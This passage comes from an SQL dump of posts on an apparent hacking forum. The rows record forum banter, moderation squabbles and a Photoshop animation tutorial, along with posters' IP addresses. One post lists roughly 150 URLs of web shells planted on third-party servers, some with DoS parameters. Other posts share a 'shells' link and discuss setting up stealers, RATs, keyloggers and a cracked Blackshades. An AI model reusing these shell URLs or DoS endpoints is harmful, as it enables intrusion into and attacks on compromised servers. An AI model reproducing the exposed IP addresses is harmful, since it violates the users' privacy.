'e07d6d57207cb0bcb72478b69834f5e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3351', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349378225', 'True. You just go into my Unique Section posted random stuff I didn\'t want to be posted. I didn\'t like them in the first place.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0434c2aa41810c2086dbb927a4e9dff5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3733', '734', '0', '3', 'Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349582977', 'Due to some dumbass LH has been currently banned by Google, LH will be receiving a few hours downtime everyday and I have deleted everyones PM and deleted a couple of inactive users. The reason being is that due to someone on LH our server got overloaded causing it to go down for 3-5 hours today. I\'m working on this so please bear with me. Any donations would be appreciated because within an hour I lost $30 and I\'m kinda of in need of money to keep LH up at the moment. Whenever you get the \"500 internal server error\" please wait 3-6 seconds then refresh the page or keep refreshing every sec. The error stays only for a couple of secs.', '72.231.24.165', '1223104677', '1', '0', '1', '1349584799', '1', '0ef96afb61075465a37d0d3a36059337', '0', '1349584799'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3354', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349378384', 'Stop making LQ posts please. And using faces as xDDDDD for example. 1 D is enough.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '471f1dbccd70fa761087cbbd637abc7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3355', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349378425', 'Granted. But Austrailia was bombed the next day. I wish I had a pet llama.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1c623b69e48706659bd6d7dbf851ff5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3356', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349378474', 'We can get that at our pace. Will take a while though. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '335b424014c2678b8d5a872782f2c672', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3357', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349378626', '35. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abaae0254ab85f8d21ef6af3066cb863', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3358', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '62', 'R?????zo?', '1349378724', 'noooo I never bought porn accounts, I got a gf and she can handle it just fine :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd42b5a7c719799cb25c0aeddb9df568c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3359', '589', '3277', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349379022', '[quote=\'iTzGRONgamer61\' pid=\'3277\' dateline=\'1349312804\'] [quote=\'NeonLights\' pid=\'3266\' dateline=\'1349304798\'] dude im blackhat... of course i can set it up for you but i suggest using a RAT instead of a stealer for more options and fun ;) or just stick with a direct email/keylogger [/quote] I have a cracked version of blackshades. (I think its cracked LOL) again I\'m on a mac, and VMware doesn\'t like me. I\'m having a lot of trouble setting it up, for some reason I\'m having port forwarding issues. To my knowledge, I do know how to port forward. I\'m PM\'ing you now, maybe we can do a team viewer/skype session ;D thanks bro! [/quote] haha :) anytime man', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'dd19e2592a844978703c3759e82bfb89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3360', '253', '1106', '56', 'RE: Count to 200', '0', '203', 'NeonLights', '1349381982', '36. i likeeeeeeeeeeeee traaaaaaaaaiiiiiinnnnnnnssssss', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '83d1e4814356e7a876f579546a4dce32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3361', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349387139', '37. I like titssssssssssss.', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '730e0cdd1461d9158bb9366ca930c49d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3362', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '100', '??zg???g????61', '1349387962', 'hahahaha nice ;D [Filler 25 Chars xD]', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '2cb14af6047921f5f17af53ed65e1196', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3363', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349388040', '38. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ebb9d1b4a0e60aeed3ca7e1df4a912c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3364', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349388112', '39. -----------Filler----------------', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '7b948fde46549d620203796b97a50db6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3365', '253', '1106', '56', 'RE: Count to 200', '0', '203', 'NeonLights', '1349388345', '40. I LIKEEEE CRUSTY GRANDMASSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'f1fe2554d2572cc643eaa1e9c0c85fce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3366', '652', '3227', '7', 'RE: Being CyberBullied', '0', '203', 'NeonLights', '1349388628', '[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] O SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK! lol... u leave in ontario? :D i live not to far from there im in montreal', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'dd851ebd3759e9ea057ae911b3f8cb77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3367', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349389051', 'First of all I didnt make any immature posts, If I did tell me which ones. And I posted in the Unique Section some sigs and headers that I used for my old group that says Unique. But you know what I dont care what you guys think. I was here wayyyy before you guys and I dont deserve to be treated like this. I would have been had wayyyy more posts than you but when I came back I lost most of my posts and was left with only 20 posts. EDIT: BTW I did contribute, I am giving away a Custom pastebin source and I was going to giveaway $10 PayPal but you guys dont appreciate anything I do so nevermind about that.', '75.22.59.99', '1259748195', '1', '0', '3', '1349389198', '1', '2c156ac50df5249b0b5c9485cccc5f2e', '0', '1349389198'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3368', '603', '3320', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349389133', '[quote=\'Kasual\' pid=\'3320\' dateline=\'1349347214\'] Could I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM [/quote] Who the fuck do you think you are? I can do what I choose to do. BLACKLISTED FROM THIS GIVEAWAY!', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '5a98c886de45943f4f1dc02a0d3235f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3369', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349389612', 'lmao i think u should calm down first off all and i havent seen anything from u that is farly usefull on here... [hr]', '67.68.75.193', '1128549313', '1', '0', '203', '1349389865', '1', 'd4ff58116292535d3e7bdf1c1fe9c189', '0', '1349389865'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3370', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '100', '??zg???g????61', '1349390278', 'Oh so you WERE going to give out $10 but now since you\'re butt hurt you aren\'t gunna anymore... Seems legit ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9141253ee85520601c56e788979e57e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3371', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349390409', '41. Grody to the max. -----Filler-----', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '622becf139e0531183db9a2365fd542a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3372', '662', '3370', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349390484', '[quote=\'iTzGRONgamer61\' pid=\'3370\' dateline=\'1349390278\'] Oh so you WERE going to give out $10 but now since you\'re butt hurt you aren\'t gunna anymore... Seems legit ;D [/quote] HAHAHAHA IKR, thats the shit everyone says when there mad to make us feel bad lmao', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e4e956040f012f1c083a50b0dd15b59d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3373', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349391228', 'Yes I was going to giveaway $10 Paypal proof that I actually have the money to do it is below. http://gyazo.com/57a71890d4554a445ac7525d1262c23f', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '3e614bffd9dbd14b58aa27384e2ef19f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3374', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349391874', 'Can you guys get back on topic now? I don\'t really care where you live. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2841c340f7d047f88f67a933bb049f62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3375', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349391978', 'Would\'ve laughed if you Inspect Element that. :p But anyways. I never really liked you. In my opinion. Some of your posts are LQ. But since you were a SMod, there was nothing I can do but respect you since you were a higher rank than me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e59290a5373c50a4125f48a3eeeb4445', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3376', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349392009', '42. iTzGRONGamer61 is my babe <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '175ce3d74426287a3b52cc372dea8fea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3377', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349392254', 'You dont have to respect me its okay. I will be back in my position.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8e1db4b1df245240060f146a1f040bf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3378', '663', '0', '61', 'Tons of shells (Unchecked)', '0', '82', 'iTzIpod', '1349392422', 'http://puu.sh/1b8ka Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '04eb007bfb08fca16f0ffee6a0b8441b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3379', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349392481', 'Why and how is that?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12943f107524e1980315d3b29c00878a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3380', '664', '0', '61', '100+ Shells', '0', '82', 'iTzIpod', '1349392517', '[b]Here are 150 shells I came across, enjoy! [/b] [code]http://mmx1.webs.com/shell.php http://mmx2.webs.com/shell.php http://mmx2.webs.com/shell.php?host=96.2...=80&time=6 http://200.107.135.189/grn.php?act=engine http://mmx1.webs.com/shell.php?host=192....=80&time=3 http://www.nafsiahasa.com/up/x.php http://217.6.136.144/webdav/shell.php http://mmx1.webs.com/shell.php http://mmx2.webs.com/shell.php http://mmx1.webs.com/shell.php?act=phptools&host=, http://mmx2.webs.com/shell.php http://ragersfantasy.com/bigbb.php?act=phptools http://mmx1.webs.com/shell.php?host=192.168.0.156&port=80&time=3 http://mmx2.webs.com/shell.php?host=96.229.136.245&port=80&time=6 http://mmx1.webs.com/shell.php http://212.152.181.186/webdav/.DAV/Emb.php?act=phptools http://mmx1.webs.com/shell.php http://62.119.49.36/webdav/shell.php http://124.106.114.243/grn.php http://mmx2.webs.com/shell.php?host=99.2...80&time=60 http://mmx2.webs.com/shell.php?host=96.2...80&time=60 http://mmx2.webs.com/shell.php?host=91.1...80&time=60 http://mmx1.webs.com/shell.php?host=91.1...80&time=60 http://mmx1.webs.com/shell.php?host=96.2...80&time=60 http://200.107.135.189/grn.php http://ragersfantasy.com/bigbb.php http://creaven7.zikle.nl/ http://217.6.136.144/webdav/shell.php http://217.128.241.163/webdav/.Dav/Emb.php http://217.6.136.144/webdav/greenshell.php?act=phptools&host=, http://mmx1.webs.com/shell.php?host=99.2...80&time=60 http://mmx1.webs.com/shell.php?host=192....80&time=35 http://mmx2.webs.com/shell.php?host=192....80&time=35 http://mmx2.webs.com/shell.php?host=174....80&time=60 http://217.6.136.144/webdav/greenshell.php http://217.6.136.144/webdav/greenshell.php?act=phptools http://161.139.194.77/webdav/shell38452.php http://161.139.194.77/webdav/shell74205.php http://kaodenuit.free.fr/post.php http://212.152.181.186/webdav/.DAV/Emb.php http://217.6.136.144/webdav/greenshell.php http://217.6.136.144/webdav/shell.php?act=phptools http://161.139.194.77/webdav/shell74205.php?act=phptools http://212.87.232.160/grn.php http://ragersfantasy.com/bigbb.php?act=phptools http://mmx1.webs.com/shell.php?act=phptools&host http://ragersfantasy.com/bigbb.php?act=phptools&host= http://kaodenuit.free.fr/post.php?act=phptools http://www.nafsiahasa.com/up/x.php?act=phptools&host http://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1 http://62.119.49.36/webdav/Shell.php http://200.107.135.189/grn.php?act=engine http://www.youtube.com/results?q=allintitle:%22PHP+DoS+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Pa&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1 http://161.139.194.77/webdav/shell38452.php?act=phptools&host=, http://kaodenuit.free.fr/post.php?act=phptools http://mmx1.webs.com/shell.php?act=phpto...1&time=100 http://200.107.135.189/grn.php?act=engine&host= http://mmx1.webs.com/shell.php?act=phptools&host= http://62.119.49.36/webdav/shell.php?act=phptools&host= http://www.nafsiahasa.com/up/x.php http://www.youtube.com/results?q=allintitle:%22PHP+DoS+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1 http://mmx1.webs.com/shell.php? http://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Pa&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1 http://38.100.207.151/webdav/Shell.php http://199.195.212.101/webdav/Shell.php http://199.15.250.199/webdav/Shell.php http://62.90.192.102/webdav/Shell.php http://200.21.104.48/webdav/Shell.php http://187.33.159.118/webdav/Shell.php http://190.128.233.114/webdav/Shell.php http://23.20.103.205/webdav/Shell.php http://61.219.75.99/webdav/Shell.php http://99.240.202.214/webdav/Shell.php http://219.132.58.243/webdav/Shell.php http://117.55.241.11/webdav/Shell.php http://2.116.32.141/webdav/Shell.php http://110.138.248.99/webdav/Shell.php http://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w http://200.37.255.246/webdav/Shell.php http://118.97.115.131/webdav/Shell.php http://221.232.144.185/webdav/Shell.php http://88.41.31.114/webdav/Shell.php http://119.15.169.85/webdav/Shell.php http://175.45.187.125/webdav/Shell.php http://125.253.124.196/webdav/Shell.php http://124.16.138.58/webdav/Shell.php http://94.251.8.211/webdav/Shell.php http://61.233.25.26/webdav/Shell.php http://202.91.13.227/webdav/Shell.php http://82.74.210.115/webdav/Shell.php http://119.134.251.8/webdav/Shell.php http://222.124.215.10/webdav/Shell.php http://113.161.70.114/webdav/Shell.php http://180.186.74.99/webdav/Shell.php http://14.139.98.2/webdav/Shell.php http://180.248.92.248/webdav/Shell.php http://195.23.154.236/webdav/Shell.php http://81.52.163.182/webdav/Shell.php http://115.182.53.110/webdav/Shell.php http://kaodenuit.free.fr/post.php?act=phptools&host= http://110.138.226.111/webdav/Shell.php http://123.30.186.54/webdav/Shell.php http://122.184.0.78/webdav/Shell.php http://213.126.23.226/webdav/Shell.php http://beacheater.blogspot.com/2011/01/php-dos.html http://beacheater.blogspot.com/2011/01/php-dos.html http://firman-mannte.blogspot.com/ http://beacheater.blogspot.com/2011/01/php-dos.html http://beacheater.blogspot.com/2011/01/php-dos.html http://firman-mannte.blogspot.com http://firman-mannte.blogspot.com/2011/04/packets-0-ip-post-rand-post.html http://beacheater.blogspot.com/2011/01/php-dos.html http://firman-mannte.blogspot.com/2011_04_01_archive.html http://firman-mannte.blogspot.com/\\ http://firman-mannte.blogspot.com/?act=phptools&host=[/code]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3220ff14e3e66a13670ebd28323af881', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3381', '665', '0', '19', '[Junk]$5 Giveaway Contest', '0', '3', '??????????¢™', '1349392591', '[b]Hello guys I have decided to giveaway $5 PayPal, I was going to do $10 but everyone hates me here so why should I give $10 if everyone hates me? You guys are lucky that I am even giving $5 away. Well to enter in this contest just post below with a number 1-5 and you will be entered. Once the numbers are filled I will then pick the winner using random.org[/b] [align=center][color=#FFD700]1. iTzIpod 2. iTzIpod 3. iTzIpod 4. iTzIpod 5.iTzIpod[/color][/align]', '75.22.59.99', '1259748195', '1', '0', '82', '1349393491', '1', '86c0fe23baf5724197b253415d444ff0', '0', '1349393491'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3382', '662', '3379', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349392647', '[quote=\'iTzIpod\' pid=\'3379\' dateline=\'1349392481\'] Why and how is that? [/quote] Dont worry about it you will see.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '0afa6ce4b339ecd5456a8ccc9a96999f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3383', '666', '0', '61', 'Detailed Animation Tutorial', '0', '82', 'iTzIpod', '1349393036', '[align=center][font=Times New Roman][size=xx-large]I.[/size][/font] [spoiler][img]http://i.imgur.com/ShZ0F.png[/img][/spoiler] [b]Create a new project and put text on your background, or wherever you want the text on.[/b] [size=xx-small][If you work with gradient, colour or pattern overlay, make sure the opacity isn\'t at 100%!][/size] [font=Times New Roman][size=xx-large]II.[/size][/font] [spoiler][img]http://i.imgur.com/W4cTU.png[/img][/spoiler] [b]On the timeline, click \"Create Frame Animation\".[/b] [size=xx-small][If you don\'t see the timeline, go to \"Window\" at the top and tick \'Timeline\'.][/size] [font=Times New Roman][size=xx-large]III.[/size][/font] [spoiler][img]http://i.imgur.com/39XhN.png[/img][/spoiler] [b]Make a new layer above the Text-Layer, select the brush tool, and make a straight white line which will be our shine.[/b] [size=xx-small][To do so, hold \"SHIFT\" on your keyboard, and draw a line from the top to the bottom.][/size] [font=Times New Roman][size=xx-large]IV.[/size][/font] [spoiler][img]http://i.imgur.com/A9R9t.png[/img][/spoiler] [b]Now create a clipping mask between both layers, the text and the shine.[/b] [size=xx-small][To do so, hold \"ALT\" on your keyboard, and click [u]between[/u] both layers.][/size] [font=Times New Roman][size=xx-large]V.[/size][/font] [spoiler][img]http://i.imgur.com/bq6ba.png[/img][/spoiler] [b]Click on the \"New Frame\" symbol, select the second frame in the timeline, and move the shine to where it should be at the end of the animation.[/b] [size=xx-small][To do so, hold \"CTRL\" on your keyboard while the \"Shine\" Layer is selected, and drag it to a specific position.][/size] [font=Times New Roman][size=xx-large]VI.[/size][/font] [spoiler][img]http://i.imgur.com/uVWEy.png[/img][/spoiler] [b]Select both frames, starting from the first.[/b] [size=xx-small][To do so, click on the first frame, then hold \"SHIFT\" on your keyboard and click on the second frame.][/size] [font=Times New Roman][size=xx-large]VII.[/size][/font] [spoiler][img]http://i.imgur.com/qOm71.png[/img][/spoiler] [b]Now click on the \"Tween\" symbol, which should open a new window.[/b] [size=xx-small][The \"Tween\" symbol is the one next to the \"New Frame\" symbol.][/size] [font=Times New Roman][size=xx-large]VIII.[/size][/font] [spoiler][img]http://i.imgur.com/HuAz8.png[/img][/spoiler] [b]Enter an amount in there from 10-50, just try out what looks the best.[/b] [size=xx-small][Don\'t forget to set unlimited looping!][/size] [font=Times New Roman][size=xx-large]IX.[/size][/font] [spoiler][img]http://i.imgur.com/3dQLZ.png[/img][/spoiler] [b]Now hold \"CTRL\", \"SHIFT\" and \"ALT\" and press \"S\" on your keyboard.[/b] [size=xx-small][To have the best quality, apply my settings.][/size] [font=Times New Roman][size=xx-large]X.[/size][/font] [spoiler][img]http://i.imgur.com/0WtYQ.gif[/img][/spoiler] [b]You\'re done, congratulations! Thanks for reading :)[/b] [size=xx-small][Tutorial written by kervz1.][/size] [color=#0000CD][b]+ + + SAYING THANKS DOESN\'T HURT + + +[/b][/color] [size=x-small]To download the PSD, click [url=http://www.mediafire.com/download.php?atovoouj5t60s16]here[/url].[/size] [/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d7d2e656c76dff444c5062ace3d0f08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3384', '665', '3381', '19', 'RE: $5 Giveaway Contest', '0', '82', 'iTzIpod', '1349393506', 'Closed/ Junked. [hr] This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349393511', '1', 'b10ab2eed9a9c9c66464e99a86abd52a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, 